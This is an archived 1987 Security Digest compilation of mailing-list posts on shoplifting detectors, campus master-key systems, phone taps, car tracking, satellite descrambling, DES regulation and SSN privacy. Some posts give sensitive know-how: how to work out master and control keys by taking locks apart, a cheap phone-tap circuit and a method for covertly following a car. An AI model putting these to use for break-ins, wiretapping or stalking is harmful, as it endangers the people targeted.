I spent a year managing a B. Dalton Software Etc. store, and we always had shoplifting problems. I'd recommend having people check out software by handing over their student ID or whatever instead. We were told that the Knogo system was there solely to scare amateurs: seeing the sensor device, which probably worked, the amateur would not rip off the store. This cuts down shortage (which also includes employee theft, I think) from 30% (unprotected) to 3% (!).

Paying a work-study student will probably cost a lot less than installing the alarm system, and you won't have false alarms, etc. Even properly tagged, activated software won't always set off the alarm, so I'd say you're looking at catching someone 7 out of 10 times (if you're lucky)...

-- 
James S. Deibele   jamesd@qiclab or jamesd@percival
TECHBooks: The Computer Book Specialists   (800) TECH-BKS
3646 SE Division   Portland, OR 97202   (503) 238-1005
TECHBooks One BBS (#1:105/4.0); 3/12/24   (503) 760-1473

From: ISA@ISEC-OA.ARPA  22-Oct-1987 10:34:13
To: SECURITY@RED.RUTGERS.EDU
Subj: [1170] Securing Floppy's

FOR MURRAY KARSTADT

Read your request for info regarding securing floppies and have this to pass on. While attending a seminar in Colorado Springs on computer security, a firm named Media Security Inc demonstrated their products.
Two of their products will fit your needs and are not very expensive. The first is called "SECUR-DISKETTES" which contain a paper-thin passive-resonant circuit. These circuits can be retro-fitted on the outside of your existing media (diskette labels). The second product is the Door Detection Unit (DDU) which detects the passive-resonant circuit. The DDU is similar to a metal detector with a 36 inch walk-through pathway. You can contact them in Colorado Springs at 303-531-9411. Hope this will help you out. We are considering purchasing these items to implement Army wide.

Good Luck

Jim Vavrina
Computer Security Specialist
Assistant Chief of Staff for Intelligence and Security
US Army Information System Engineering Command
Ft. Belvoir, VA
DDN: ISA@ISEC-OA.ARPA
Phone: 703-664-3339

From:   26-Oct-1987 15:20:41
To: security@red.rutgers.edu
Subj: [949] Homing device, Shoplifting detector

To Wendy Fraker, who wants to track cars: I have never seen such a device advertised. Unless it were a complicated (=expensive) inertial guidance system gizmo, it would basically be something which gave off a signal which you located by triangulation. Maybe a Walkman (TM, or (R), or something) connected to a cheap walkie-talkie would work. But I think you'd need 2 distant locations which could both pick up the transmissions & communicate to each other.

To Phil Benchoff, who asks about magnetic shoplifting security devices: Our library uses a magnetizable glue on its books (maybe some iron oxide is in it). They just put a drop in the binding of a new book. So if the stores are using glue, naturally you wouldn't find anything when you disassembled your purchases.

From: trwrb!ries@ucbvax.berkeley.edu (Marc Ries)  20-Oct-1987 15:58:49
To:
Subj: [1606] Re: garage frobs

>I once thought of all the fun I could have if I got a one hundred watt
>linear amp and attached my tiny garage door transmitter to it.
>
>An entire neighborhood with ONE remote control!
I installed a new, higher horsepower garage door opener about a year ago (after the old Genie died). Several times, several months back, I noticed that the garage door was up but shrugged it off as having forgotten to close it at night. A couple of weeks later the garage door was up again, only this time, several things had been stolen out of the garage.

I changed the codes, but several times at night we caught the door just *opening* by itself with apparently no one around. Finally, I installed a "shunt" circuit to the opener, so that the door can be manually switched to not open.

In retrospect, the door has *never* come up by itself during the day. The old door never came up by itself, period. They do use different controllers. However, most (if not all) of the "openings" have been before or after military helicopter passes. I remember reading about how a lot of door openers get "openitis" when the Presidential Air Force One plane is in town, apparently having to do with signal jamming.

PS: The idea of "cycling thru the codes" is apparently also becoming a problem with the newer "remote" auto alarms.

-- 
Marc A. Ries
   sdcrdcf!---\
   ihnp4!------\----- trwrb! --- ries

From: campbell@maynard.BSW.COM (Larry Campbell)  22-Oct-1987 02:28:10
To: misc-security@seismo.css.gov
Subj: [1347] Re: car homing devices

<>Does anyone know where to conveniently purchase some kind of device
<>to place in a car to track where that car is going?

There's a local company that makes a gizmo called a LoJack. It's a gizmo you conceal in your car. If the car is stolen, you call the police, who transmit an encoded activation signal. The LoJack receives this signal and activates a radio beacon, and police homing radios can then locate the car in a few hours. Apparently it works quite well and has a range of several or even several dozen miles.

It is currently available, but I think it's not cheap (wild guess: $500). I don't know, and rather doubt, whether you can buy one for your own use.
You have to register it with the State Police when you install it, presumably so they have a record of the activation code or something. (For paranoids only: this is really so they can track you whenever they want.) And you probably need some sort of license for the transmitter on either end.

-- 
Larry Campbell                          The Boston Software Works, Inc.
Internet: campbell@maynard.bsw.com      120 Fulton Street, Boston MA 02109
uucp: {husc6,mirror,think}!maynard!campbell     +1 617 367 6846

From: Jose Rodriguez  26-Oct-1987 14:06:42
To: security@red.rutgers.edu
Subj: [430] re: master keys

Talking about master keys and such, has anyone seen a type of key that has no teeth and is just a straight piece of metal? I think they had "safety" stamped on them but I am not sure. When I was a little kid I had a couple but never found out what they were for.

Jose
jrodrig@edn-vax.arpa

From: gatech!codas!ki4pv!tanner@RUTGERS.EDU  23-Oct-1987 07:40:52
To: security@red.rutgers.edu
Subj: [1262] Re: Electronic door locks and anti-shoplifting devices

The contents of that magical little card (or of the anti-shoplifting device, which is (as suspected) applied to a sample of the merchandise): one or more (for a 4-digit system, 4) layers of metal foil, cut in such a way as to resonate at a certain frequency.

Contents of the door-watching box: an rf source, set to sweep across the range of frequencies for which the foil layers are set. Further contents: an rf dip detector, which notices at which frequencies the RF power takes a sudden dive (being sucked up by foil layers).

The freqs are numbered, of course, and you can assign a number to any set of M out of N selected. Note that order is not important; thus (eg) {1,4,8,17} will look the same as {1,8,17,4} to the device.

Simpler systems may just (like our school library) have one piece of foil glued to the inside of the book. If that freq dips suddenly, you sound the alarm.
Print something such as the institution's name on the foil sticker so that people don't realise that it is not just a name-plate, of course.

Tanner Andrews, Systems
CompuData, Inc. DeLand

From: EVERHART%ARISIA.decnet@ge-crd.arpa  27-Oct-1987 02:42:49
To: AWALKER@RED.RUTGERS.EDU
Subj: [1089] DES is NOT legally required

I'm afraid Peter Wayner misunderstood what I had reported. I was told, by some folks I was inclined to believe, that international communications must be decipherable by NSA. This may be law, regulation with the force of law, or simply misinformation that I was passed. I'm not a lawyer and have neither time nor inclination to dig through the roomsfull of US federal law and regulations to search for any such thing. However I was told this by a few different sources several years back in the context of DES ciphers etc...

As I understand it, various agencies, some with 3 letter acronyms, claim the right/power/etc. to require that you furnish the keys to your unbreakable ciphers or that you use breakable ones, DES being breakable when your computer resources include a few Crays, as some agencies' do.

I did NOT report that DES is required for international communications. In fact, I'm not sure that it's even a very good idea to use it...

glenn

From: imagen!hedley@decwrl.dec.com (Hedley Rainnie)  24-Oct-1987 14:37:24
To: security@RUTGERS.EDU
Subj: [1338] NSA underwater tap

The discussion earlier of what safeguards can be made to protect one's privacy reminds me about a description in the new book on the CIA from 1977-1985 (???). I forget the book title (it's in hardback). It describes an operation which Pollard subsequently had leaked to the Soviets, involving the NSA and the Navy. The goal was to place a passive listening device AROUND the underwater cable.
This device records the line transitions by command for a one-shot eavesdrop on sensitive military data. The Soviets were so convinced about the security of the cable they did not encrypt the data, as opposed to Soviet land-based comm. which has excellent coding. Once the recorder had done its stuff a submarine would launch a midget earth walker/diver to collect the tape and insert a new one. The device was made so that if the Soviets decided to examine the cable, the device would fall away, staying on the bottom, leaving the cable 'untouched'. I think the book called the operation 'Blue Bells' (?); anyway, they realised when the device was missing that the job had been compromised.

I think a discussion about such interesting security penetrations would be of interest to many.

Cheers,
Hedley

From:   26-Oct-1987 15:21:50
To: security@red.rutgers.edu
Subj: [442] Software Security

Murray: My favored way to keep students from ripping off original disks is to use only unprotected software. Only a jerk would steal the original when he could make a copy in a minute. Plus, you can keep backups in case someone does, or just give students the backup and keep the original locked away.

From: Andy Mondore  26-Oct-1987 18:18:16
To: security@red.rutgers.edu, murray@andromeda.rutgers.edu
Subj: [609] Murray Karstadt's item in Security Digest

Here at RPI, we use a fairly low-tech solution for disk/manual security in the public labs. During the hours that the lab is open, a site monitor is always present. If a user needs a disk or manual, the user gives his or her ID card to the monitor, who then signs the disk or manual out to them. When users return the item, they get back their ID card. As far as I know, the system is fairly successful.

From: ut-sally!ivan@uunet.uu.net (Ivan M. Milman)  27-Oct-1987 00:33:40
To: misc-security@uunet.uu.net
Subj: [612] Re: Request

>I'm doing some research on computer databases used for blacklisting
>purposes.
An excellent source for such information is "The Rise of the Computer State" by David Burnham. He mentions a company called U.D. Registry which maintained a list of tenants who had been involved in litigation with their landlords.

Ivan
-- 
Ivan Milman: ivan@sally.utexas.edu or {ihnp4,ctvax,seismo}!ut-sally!ivan
"Basic research is what I do when I don't know what I'm doing." - Werner Braun

From: Jeffrey R Kell  28-Oct-1987 08:56:29
To: SECURITY@RED.RUTGERS.EDU
Subj: [1514] Re: Master/sub-master keying systems

One more lock note: one of my first real paying jobs was as a bellman (read: Flunkie) at a local franchise hotel. They had just over 250 rooms, plus assorted locked service areas (housekeeping, maintenance, storage, etc). Although not a real bona fide locksmith, one of my tasks was to cut keys once a week, as plenty of people don't leave their keys when they check out. All the real keys are kept in a locked cabinet behind the front desk (including masters) and all keys given to guests are just copies.

There were three key blanks: two for guest rooms (divided in half by floors, there were two systems) and one for maintenance areas. The maintenance areas were not on a master system at all (somewhat obviously). The rooms had (1) the "maid" key which was a straightforward master cut from the regular room blank, and (2) the "security" master which was identical to the "maid" key except that it had one additional pin; in order to duplicate the "security" master (which you weren't supposed to do, but you get tired of signing keys in/out to do room checks) you had to cut the room master back one additional tumbler location and extend the horizontal grooves back through the extra space. The "security" master would open the deadbolt!

I've always felt safer with a chain or doorstop than a deadbolt ever since.

/Jeff/

From: "Curtis C. Galloway"  28-Oct-1987 10:34:41
To: Security@RED.RUTGERS.EDU
Subj: [1277] Re: Unscrambling satellite signals

>A friend of a friend bought a Video-Cypher II box some time ago with the
>intention of paying a fee to the various providers of signals he was
>interested in. This weekend I learned that this person obtained a chip for
>the Video Cypher II box which will unscramble ALL signals at ALL times.

As I recall from a magazine article in Radio-Electronics, this particular pirate chip actually contained a valid serial number from some unsuspecting person. The chip was then hacked up to turn on all the satellite services. The net result was that the scrambler company could disable all the "universal" chips by simply deactivating the original serial number. The pirates could keep switching serial numbers, but at the time of the article a few months ago, all the supposed "universal" chips used this technique, and it was not possible to scan the satellite broadcasts for valid encryption keys.

--Curt Galloway
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cg13+@andrew.cmu.edu   UUCP: ...!{seismo, ucbvax, harvard!andrew.cmu.edu!cg13+
Drop In Any Mailbox, Return Postage Guaranteed

From: kludge@pyr.gatech.edu (Scott Dorsey)  21-Oct-1987 10:51:49
To: misc-security@gatech.edu
Subj: [1083] Re: telephone tapping

Kaptain Kludge's Cheap and Easy Telephone Tap:

[ASCII schematic garbled in extraction; its surviving labels: "phone line", ".1 MFD or so", "600-1000 ohm transformer, or old transistor radio output transformer", "to mike input of cheap cassette recorder", "48V relay (110Vac relay works too... not well, though)", "to tape control".]

Total cost: assuming broken transistor radio is lying around, and a tape recorder can be 'borrowed' from somewhere: $5.00 or so for an RS relay.
-- 
Scott Dorsey   Kaptain_Kludge
SnailMail: ICS Programming Lab, Georgia Tech, Box 36681, Atlanta, Georgia 30332
Internet: kludge@pyr.gatech.edu
uucp: ...!{decvax,hplabs,ihnp4,linus,rutgers,seismo}!gatech!gitpyr!kludge

From: nuchat!steve@uunet.uu.net (Steve Nuchia)  26-Oct-1987 22:53:10
To: security
Subj: [2878] Re: Simson Garfinkel's article, part 3 of 3

> Often a program can be patched so as to remain the same size by using
> partially full pages or replacing seldom used routines. On many systems the
> modification date can also be changed back to the original date (this is
> nice when copying files).

In general these schemes could be based on taking a checksum, CRC, or similar data-reducing aggregate function of the data. If you keep several mathematically independent functions of each file you can check the system state with comparatively little overhead and acceptable certainty. The idea is that it is hard to find a patch which simultaneously preserves each check function.

> If you keep another copy of the program to run a diff against it should be
> hidden so that both the program and the copy aren't changed. Best would be
> to bring a copy in off some removable media to do the comparison.

Using the reduction allows one to base the scheme on a paper listing or equally secure object. Of course one has to trust the check program, and recursively the tools used to load the program, etc. If you postulate that the system has been corrupted it is very difficult to see how to get to a trustworthy checker.

Assuming unix, for instance. You could mount a removable pack containing the trusted program, and we can assume that the virus hasn't invaded the mount system call. Now what? The shell is corrupted, so you can't be too sure it will really execute your checker. The kernel may be infected and translates calls to open on the kernel to open calls on a copy of the old kernel. Isn't security fun?
In general security, or trustworthiness, is a property of the system which must derive by strict induction from a trusted base condition. Once the chain of induction is broken by an event which _might_ allow a virus into the security base you cannot trust the system again. You _can_ freeze the system and audit it from the outside.

On my system I would build an audit program on a bootable floppy and keep it in a safe place. I'm not that paranoid - I believe that I'm not a sufficiently desirable target to expect really sophisticated viral attacks. But if I were I'd do a floppy boot and run a security audit before I made backups each day. The possibility of this is assured by my faith that the hardware physically cannot alter the bootstrap ROM. Of course I have not proved the bootstrap code, but its operation is sufficiently removed from the area of interest that I'm pretty sure it cannot be subverted.

-- 
Steve Nuchia       | [...] but the machine would probably be allowed no mercy.
uunet!nuchat!steve | In other words then, if a machine is expected to be
(713) 334 6720     | infallible, it cannot be intelligent.  - Alan Turing, 1947

From: GREENY  26-Oct-1987 15:22:47
To:
Subj: [1159] re: Re: Master Keys

> Not to mention the MASTER-master-key of most...

This is generally known as a Control Key. Only the Locksmiths or Police or other *trustworthy* people are supposed to have these keys. At the school I attend we have such a beastie (or BESTie) for a key system and one of 4 keys will take care of opening any lock on campus. These are:

1) Your individual key
2) The Department Master Key
3) The Police Master Key (opens any key with that particular core)
4) The Control Key (which just pulls out the core so it can be changed or so that the latch can be turned with a screw driver....)
In general, professional key systems are made so that you can't jiggle your key and get it to open another lock by 'hitting' the master pins.... Usually this is accomplished by using high tension springs or mushroom drivers if they have to have a large # of keys open the lock.

bye for now but not for long
Greeny
Bitnet: miss026@ecncdc
Internet: miss026%ecncdc.bitnet@wiscvm.wisc.edu

From: *Hobbit*  28-Oct-1987 17:03:33
To: security@RED.RUTGERS.EDU
Subj: [1462] mastered systems

Creating master keys is *not* a trial-and-error process. A correctly configured system never sees brass until it's all planned out as a huge chart of cut numbers, or actual thousandth-inch measurements. All the cuts conform to the basic common-sense rules of keying, like cuts must be a certain minimum distance apart so you don't get the tiny-split-fell-out screw, and the user keys don't have low cuts near the bow, and the master cuts aren't necessarily all above or below the user cuts, etc. There are even programs for micros out now to help locksmiths plan mastered systems that know these rules and the maximum cut heights of different brands of locks. They also help the locksmith keep track of what key opens whose door when repairs are needed, and print out the final chart of the whole thing.

Similarly, if you're going to try and determine the master combo for a given system, you do need to take at least one example apart. A pair of .001 inch calipers is very helpful, because then one doesn't need the lock itself to cut the key. All you need is pin heights, spacing, and the outer diameter of the plug minus a small slop factor. [The MIT students someone mentioned apparently didn't think of this.] It gets even hairier when you have control keys for Best and friends. Sometimes even *those* are mastered.

_H*

From: gwyn@brl-smoke.arpa (Doug Gwyn )  30-Oct-1987 12:56:10
To: misc-security@uunet.uu.net
Subj: [2424] Re: master keys

jcmorris@MITRE-BEDFORD.ARPA (Joseph C. Morris) writes:
>the keys were manufactured by students who had removed the door locks from
>the bathrooms in the main MIT building

I don't know of any techie university where this doesn't occur. When I was at Rice, it was usually stairwell doors. To make matters worse, there was a "GreatGrandMaster" key that would open most doors on the whole campus.

With Best locks (or ones of the same general style), disassembly of a single cylinder (usually involving milling off the top) is tantamount to obtaining the master key. This is due to the fact that generally a single "control key" is used to remove all cylinder cores. Having removed the core, a simple tool (or even a large screwdriver) can be inserted to operate the cylinder. Alternatively, the lock breaker could surreptitiously remove one core at a time (presumably leaving in its place a core of his own, possibly keyed to open on all alternate-numbered splits in each column in case someone tries to enter while the substitute is in place); removed cores can be taken home and disassembled at leisure. Of course, the true master key bitting eventually emerges as the common bitting that would open all examined locks.

There are several steps that institutions can take to minimize the risk from such activity. An obvious one is to avoid excessive master-keying, especially the use of a single GGM. Another is to not master-key doors that are usually left unlocked. Periodic rekeying (including control keys) is also advisable.

The other big techie pastime at Rice was exploring the "steam tunnel" system; these tunnels connected the major buildings to carry water pipes, conduits, etc. Generally once a single entry was found, one could wander anywhere.

University administrations should consider why smart students have to resort to such misdemeanors for intellectual stimulation. One would think that the normal activities should provide that.

P.S. I don't recommend this kind of activity, even if you feel the need for some excitement.
If you get caught, you'll get more excitement than you bargained for. Try making nitrogen triiodide, or trinitrotoilet tissue, or something else like that for excitement. Too bad you won't get any official credits for it either. Be careful!

From: sundc!netxcom!dgidez@seismo.css.gov (Daniel Gidez)  3-Nov-1987 19:10:02
To: seismo!misc-security@seismo.css.gov
Subj: [384] night scope

I am once again asking about this stupid machine. Where can I buy either a used or surplus nightscope, or, if available and totally independent, an infrared sniperscope? And yes, I do know they are mucho $$$.

pls respond
dgidez@netxcom.UUCP

From: yetti!utzoo!henry@uunet.uu.net (Henry Spencer)  3-Nov-1987 19:39:58
To: misc-security@uunet.uu.net
Subj: [857] re: Master keys

> There is a very simple reason why master keys tend to have less metal on
> them than the non-master keys. It's easier to make them that way.

Well, there is also a reason to do things the other way: if the master has less metal on it everywhere than a non-master, then one can file a non-master down to make a master. The only time I ever took a close look at the shapes of keys (in a scheme that used multiple levels rather than distinct keys plus a master), the less powerful keys had less metal on them, so the file trick wouldn't work. (Rats! :-))

-- 
PS/2: Yesterday's hardware today.    | Henry Spencer @ U of Toronto Zoology
OS/2: Yesterday's software tomorrow. | {allegra,ihnp4,decvax,utai}!utzoo!henry

From: *Hobbit*  4-Nov-1987 01:10:52
To: security@RED.RUTGERS.EDU
Subj: [1864] hotel deadbolt hacks

There are two ways to go about this. The first method uses two little sprung pins mounted at about 10:00 and 2:00 in the back of the cylinder, just past the last pin. If the key is turned to 4:00 or 8:00, the open bottom of the keyway exposes the end of one of these pins, and it jumps out into the bottom of the keyway, preventing further rotation.
The pin is mounted at such an angle that the plug can "retreat" from this wedged position, but not continue past it. A key cut such that there is enough metal protruding past the last pin will keep these pins up inside their holes, allowing full rotation.

The second method uses the last pin as a sort of switch. At the last pin position the cylinder is machined out large enough to accommodate a ring, which surrounds the rear end of the plug. This ring has a hole through it for the last pin and a stub sticking off the back near the bottom. It is also of a known thickness. Raising the rear pin to the normal plug shear line will allow the plug to turn, but the ring remains stationary [held by the driver]. At about 4:00 or 8:00, the tailpiece hits the ring's stub and can't rotate any more. The master key raises the last pin to the next level, such that the ring now turns with the plug, and doesn't impede the tailpiece.

In either case, full rotation is required to shoot the deadbolt, but only a quarter turn or so pulls the spring latch. Thus a guest key can't shoot the deadbolt but the specially cut masters can.

If you're worried about people getting into your hotel room, carry your own keyed cylinders with you and swap them when you arrive. Probably against fire regs, but it works. When was the last time you found yourself inside a burning hotel?

_H*

From: simsong@broadway.columbia.edu (Simson L. Garfinkel)  31-Oct-1987 16:56:10
To: hunter-larry@yale.arpa, security@red.rutgers.edu
Subj: [1802] DES and international communication

I just bought John M. Carroll's Computer Security, second edition, which is really a terrible book that I cannot recommend, because it is not adequately footnoted (ie: it doesn't have any references), is full of anecdotal information that is just plain wrong, and has lots of inaccuracies. But it does have some kernels of truth.
One of them, about DES, is instructive. Anyway, there is a paragraph in the section on DES which is interesting:

"In all fairness to NSA, it should be noted that according to the 1932 Treaty of Madrid, every national government is responsible for the nature and contents of all telecommunications messages originating within its territory. The national cipher agency may well have an obligation in international law to be able to break ciphers used by its citizens. In some Western European countries, a private person or firm wishing to use cryptography is obliged to deposit a copy of the keylist with the national Post, Telephone and Telegraph Agency." (p.202)

Which is a great paragraph, except that it answers more questions than it raises: which countries, what are the penalties for not doing this, does it apply in United States or Canada (Carroll is a Canadian), and things like that.

................................................................simson

BTW: If John M. Carroll *is* reading this mailing list, or if somebody on this mailing list knows him, please ask him to send me a message. I would like to ask him the reasons for some of the inaccuracies in his book. I'm curious if they are intentional or if they are for some sort of "security" reason.

From: gwyn@brl-smoke.arpa (Doug Gwyn )  1-Nov-1987 19:48:37
To: misc-security@uunet.uu.net
Subj: [2240] more about master key security

In my previous message about techie school lock cracking, I forgot to mention a couple of other important issues.

If one has an ordinary unprivileged operating key for a lock, and if the lock is master-keyed, then by disassembling the lock one can quickly determine possible master-key bittings. In particular, in a one-level mastering system, any split in a pin column that does not match the operating key bitting is almost certain to match the master key; if there is only one split in a column, then the master key must have the same bitting as the operating key in that column.
This and the previous information I posted make it clear that in order to gain reasonable security in a master-keyed system in an environment such as a college campus, the lock cylinders must be protected from removal for disassembly and inspection. Properly-installed Best mortise lock cylinders have this property, because they are fastened not only with the typical long screw against a notch in the side of the cylinder that can be loosened after removal of the plate on the side of the door, but they also have an internal diagonal set-screw that prevents simple removal of the cylinder unless the core is first removed with the control key. If the whole system is properly installed, there is no first loose cylinder to be removed to figure out the control key.

Use of restricted key sections can help, too, since one cannot simply buy such a blank at the local 7-11. However, a diligent lock cracker can make his own blanks. I knew a fellow who filed one out of a piece of stainless steel; if you have access to a milling machine, it is not hard to make a suitable key blank.

I again remind you that I'm not recommending this activity, which involves more risks than anyone in his right mind should decide to take! It also usually involves property damage, which is unethical. I hope this information will help campus locksmiths improve the security of their lock systems to the point that few students will find this activity sufficiently rewarding to bother with, compared to the effort required.

From: "Rex Wheeler (Tiger)" <90720579%WSUVM1.BITNET@wiscvm.wisc.edu> 2-Nov-1987 23:13:12
To: SECURITY@RED.RUTGERS.EDU
Subj: [382] Re: pc lab

One thing you could do to prevent software from leaving is have PCs with ONLY hard drives (no floppies). You would probably want to have one external floppy drive that you could use to get stuff on and off the hard disks.
From: Knock Knock 3-Nov-1987 10:42:23
To: security@marist
Subj: [1288] PC Lab Security

> Have one PC in your lab designated as a file server. Students
> must bring their own floppies and copy any needed software
> off the (read-only) hard disk of the file server onto THEIR OWN DISKS.

Doesn't this present some legal problems due to the copyright laws? I didn't think it was legal to allow/require people to copy software. Doesn't this also present some technical problems due to copy protections?

At BC, I believe we presently use a Check-Point security system. This system is easy to fool if you know a trick or two, but has served as a GOOD deterrent. In addition, each student borrowing software or manuals is required to leave his/her BC ID at the front desk. The front desk then records, on our main computer system, what was borrowed. If the student fails to return the borrowed items, the front desk has their ID, and the main computer can help locate the student and/or bill them if the administration feels that it's appropriate. Both these systems are openly visible, which helps to deter users from attempting thefts. Neither of these systems is perfect; we still lose things, but I think it's the most practical I've seen thus far.

Dave R

From: kludge@pyr.gatech.edu (Scott Dorsey) 1-Nov-1987 12:46:45
To: misc-security@gatech.edu
Subj: [1667] Re: Homing device, Shoplifting detector

> To Wendy Fraker, who wants to track cars: I have never seen such a
> device advertised. Unless it were a complicated (=expensive) inertial
> guidance system gizmo, it would basically be something which gave off a signal
> which you located by triangulation.

The solution is to install a small oscillator transmitting on the Class C Citizens band in the remote car. Just put out a continuous signal at whatever power you can manage. If possible, run a wire to the car antenna, but a drag line will work.
Now in the chase car, you have a loop antenna mounted on the roof (or a ferrite loopstick if you wish to be less conspicuous and can afford to lose the gain), going into a shortwave set with a BFO and an S-meter (like an old military rig or a ham mobile set). By rotating the antenna you can determine the direction of the signal from you. If the car is moving, you can follow it, keeping it at 0' at all times and hope that you are gaining. If it's stationary, you can take a bearing, move over a few blocks, take another bearing and triangulate.

Years ago, Fudalla and Associates made a CB beeper. I think Miles Wireless Intercom made one using the FM band, and R.B. Clifton made a 49 MHz version, but it's been a long time since I've been looking at such devices.

--
Scott Dorsey   Kaptain_Kludge
SnailMail: ICS Programming Lab, Georgia Tech, Box 36681, Atlanta, Georgia 30332
Internet: kludge@pyr.gatech.edu
uucp: ...!{decvax,hplabs,ihnp4,linus,rutgers,seismo}!gatech!gitpyr!kludge

From: Nick Papadakis <@eddie.mit.edu:nick@MC.LCS.MIT.EDU> 2-Nov-1987 22:05:40
To: security@RUTGERS.EDU
Subj: [8294] Why secure systems?

In the interest of beginning a flame war (things have been too quiet lately ...), I offer the following text, which was written by Richard Stallman in 1983. If I ignore for the moment RMS's interpersonal skills and concentrate on *what he is saying* rather than how he goes about persuading people of its truth (which has alienated a good many folks), I have to admit that it sounds to me as if he is on the right track. What do you think?

- nick

--- file is oz.ai.mit.edu:whyhack.text.10 ---

Recently the teen-age computer "hacker", the security cracker, has become a topic of national concern. But the many articles on the subject have condemned the cracker without showing the galling aspects of the way of life he is rebelling against and without questioning its ethical foundation.
There is no hint that the confused cracker of today may be resisting, albeit ineffectually, a serious social problem of tomorrow.

If you look at the social organization of the users on a typical timeshared computer of today and compare it with other social groups, it most resembles the Soviet Union. It is pervaded by suspicion, ruled arbitrarily by a small oligarchy, and hostile toward outsiders. This arouses resentment, which inspires the security crackers. But the authoritarian social organization itself is a worse problem than the crackers are.

Most computer users see no alternative. I am fortunate in having experienced one. At the MIT laboratory where I have worked as a researcher for ten years, our old computer system treated users as free equals with a responsibility to cooperate, and guests were welcome. Our hospitality guided clever young people to become responsible engineers rather than crackers.

On the typical computer system, the activities of the ordinary users are regulated very narrowly and precisely by the elite, who are bound by no principle of fairness or due process and allow no appeal. Which files you can read, which files you can write, how many files you can have, what programs you can run, how long you can use them, and when you can log in are under their control. They can bump you off the computer at any time. They can watch what you type as you use the computer; you cannot watch them. They can make it very easy for you to do your job, if they like you, or if you curry favor. Or they can obstruct you at every turn, making your life miserable. You have no recourse. They can use the commands that change a user's restrictions, and you cannot, because your restrictions don't permit it.

The users are suspicious of each other, and use "file protection" to deny each other access to files. Often this means you cannot make progress in your work because you need to fix a program you cannot get at.
People with high morale become discouraged and cynical because of this. The authorities are immune to file protection, however, and can easily erase your file if they do not like what it says.

People outside the organization are viewed with hostility and suspicion. They are presumed to lack only an opportunity to delete or scramble all the files on the computer. If the computer is idle, at night for example, its computing power goes to waste rather than allow an outsider to use it for a constructive purpose (such as learning to program).

Now imagine that one of the people outside the organization, the recipient of all this suspicion and hostility, is a hacker: a person who is curious, playful and enjoys clever humor. (When computer researchers at MIT in the 1960's first began calling themselves "hackers", this is what they meant. I am proud to call myself a hacker, and I call security-breakers "crackers" to emphasize the distinction.)

A hacker, finding a mysterious and complicated computer system, wants to understand it. He would like to explore the computer system, to learn how to use it, or to learn how it works. He knows in advance what reception he will get if he simply asks to use the computer when there is spare time. And he senses intuitively that computer system authorities in general are amoral and do not deserve respect. Naturally, he tries to sneak in and use the computer anyway. He becomes a cracker. If successful, he gets to explore and learn, and can be proud of his cleverness as well. Beefed-up security measures only make the battle of wits more challenging and absorbing.

But if he is only a teen-ager, he is probably not used to the kind of thinking that would enable him to question the social system he is part of. (The teen-agers who are politically aware are usually not the computer enthusiasts.) He knows only that he has something to resent. So he does not make a serious attempt to change the system.
The best he can manage is instinctive, furtive disobedience. This is why the young cracker seems so unsure of the rightness of his actions, and occasionally may do minor damage, almost without noticing. He has not asked the question of how he ought to behave, or how the computer owners ought to behave.

This is also why it is so easy to win a cracker over to the security-enforcing establishment with personal inducements. Joining the authorities will end his direct personal difficulties and recognize his cleverness, even better than successfully evading them. Without an ethical awareness, he does not see that he solves his own problem only by contributing to similar problems for others.

The software on most computer systems is designed to support the ruling class just as surely as the KGB is. The software written and used by the hackers at MIT was designed to make users free and equal. Our system had no restrictions that could be imposed on selected users; all users were treated alike. Thus nobody could seize power by restricting everyone else. We did not care whether a change to the files was authorized; we cared whether it was an improvement. This can only be decided by human beings, on a case-by-case basis. So, rather than having file protection to control changes, we called for discussion of any planned change. And if a stranger came to the lab and wanted to play with the computer when it was not fully needed by us--we let him! Chances are he would appreciate some of the value of our work, learn from it, and spread the knowledge to others. At best, he would become enthusiastic for our software and our attitudes, join our lab, and contribute to our work.

People hearing about our lab usually took it for granted that our system would be destroyed by vandals. Actually, vandalism was very rare, and the damage done by vandals was small compared with the damage caused by the inevitable computer malfunctions and our own mistakes.
Simple measures analogous to the glass window on a fire alarm discouraged dangerous activities, deliberate or accidental, without actually forbidding anything. Ultimately it was rising commercialism that destroyed the lab and caused our old computer system to be junked.

The technology of computer security is not suited to any middle ground between the extremes. Unless security is iron-fisted and dominates the lives of the users, it is easy to circumvent, and useless. We should put military secrets, bank records and the like on computers with strict security. For other activities, we should have computers that are free of security, and free of its burdens. Then we need not attack the symptom of morally confused crackers with jail threats, security technology, or hiring them as security enforcers to breed more resentment and new crackers. We can invite them to use computers openly on terms of mutual respect, and they will repay our friendship tenfold. Their cleverness and curiosity are just what make for a creative engineer.

So far the issue of security versus freedom on computer systems affects mainly computer hackers. But, in the future, computer systems will play a bigger and bigger role in everyone's life. And these systems will be built on today's entrenched authoritarian tradition, unless we stop it. The crackers are a warning sign of a problem that every American is going to face--soon.

From: *Hobbit* 11-Nov-1987 03:43:25
To: security@red.rutgers.edu
Subj: [19078] Yet more about SS numbers

Hopefully this is the last of it...

_H*

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Subject: Another no SSN reason
Date: Fri, 02 Oct 87 22:38:30 -0400
From: new@udel.edu

Nark Mason writes about Social Security Numbers:

>I still haven't seen anyone give a good reason *why* to keep it [your
>SSN] secure. ... What horrible deed can be done with it that makes it not
>worth giving it out and the hassle that might follow?
Well, here's a story that happened to a good friend of mine that I wouldn't want to worry about. She sent in her tax returns, and got a letter saying she still owed $6000 for the money that she inherited, plus fines and interest and a possible jail sentence. It turns out that someone, somewhere had inherited money and made up an SSN at random to avoid the taxes. After about six months of "hassle" (to say the least) she finally convinced the IRS that she did not inherit anything. She was able to do this only because the name did not match the SSN, and the address was in New York instead of her actual address near Phila.

Now, I have been fighting institutions that use my SSN as a key primarily because most of these insist on printing it on the mailing label along with my name and address. They claim this is so that when mail comes back (mail that most people would consider "junk mail" anyway), they can remove the name easily from the mailing list. Can you imagine the "hassles" I could have if the clerk at the institution plans ahead for a successful trip to Atlantic City or Vegas, taking a few names, addresses, and SSNs along? How about the postal clerks that get to read my SSNs?

My main complaint is not with the institution that uses my SSN as a key, but rather the uses other than as a key to which it is put. Incidentally, does anyone use a database package that can handle sufficient volume that names cause too many clashes, yet that does not have a mechanism for generating unique keys? Why must I supply my own key? Not only am I reduced to a "mere number," but I must reduce MYSELF to a number.

Regarding Government agencies' requirements, what about Federally funded institutions? Can universities that are federally assisted demand my SSN?

- Darren New
University of Delaware
new@dewey.udel.edu

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

